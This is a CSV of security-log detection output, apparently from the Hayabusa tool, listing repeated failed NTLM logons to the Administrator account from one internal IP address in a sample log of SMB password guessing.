2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ns12T94itDDRxYxC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8jplFaHgwrWpFY8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ9L626fGZQkNC25 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HfplQ16d7lsObzki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c30ILHx5sYZCMflg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GMsJKiYmbgbr9wF0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2hpQI6z68MVBzoW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDgzJjXBnWDSVjdg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0XU5HdsnM0Lvpvq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjmtkv6JDb4s2WnR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6mBM2WMWlKkQHZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3jo7coI8uS8JCorc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ao6QcPI3nzpNnHi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WkP8vstCEOH9wnUW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzrhcYEue85zhZ8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ivpdjGaxoZOCTxbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIsZXHE4Swkbytiu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bdT2bVjtEd6KhQWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RT9Tqp0lf0dd6h9C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xwhlrl2ck1o2qTDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lxX2762Fa804981t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O55rRqTo9vgwnYoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zo7BzxXZDdykOXoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6YGEMcvYtwNJys39 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0xq8et2LwWSgVgk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43EK0cGlZBhWRd5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UBoGMdTjWVVVvifn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcCrPXp3VLObGU6v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zhZguuPimqAruiTu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o6amdSWFFbueCyp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0wRaNXdhMlIY1HX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J8jqrrwWeKZGypW0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8LIavw2zakOP4DqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qz7gr4vA633waQ01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2TmHz5POLSNJHm2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DcpOxhy2nnLIEGHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gJxfDgfujy5Um2wa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 217VTq8EbYIDeSXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPfE1m0tsJAJnRt9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OQCfGhvBMSq3PIoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XBl6JIRetWEnjaVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KXJMNnj4LeBIYARt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3sdn9f4xtvcsaHp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DWT0NepMYD29cOwh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DDb7wV6uzj1tat2d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RBcmANUL4a6DFobS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL2swHF9MtnCfnp3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0ZkcAD0IakqSUph | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5HgksdIGukmliZeE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYoLckmmOWCSf4Q2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PTxr8Zkz2y2XwBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3caypkIM2XqoSSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yuQOUzJ6sU5AhARR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SyM3OrjUHub9k23k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vY7SRoWumGQOrljW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iFrO2nUMlfeDLGyc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9B8Gq7d30U8DqdN0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxSPuxpCHgSo1d1a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
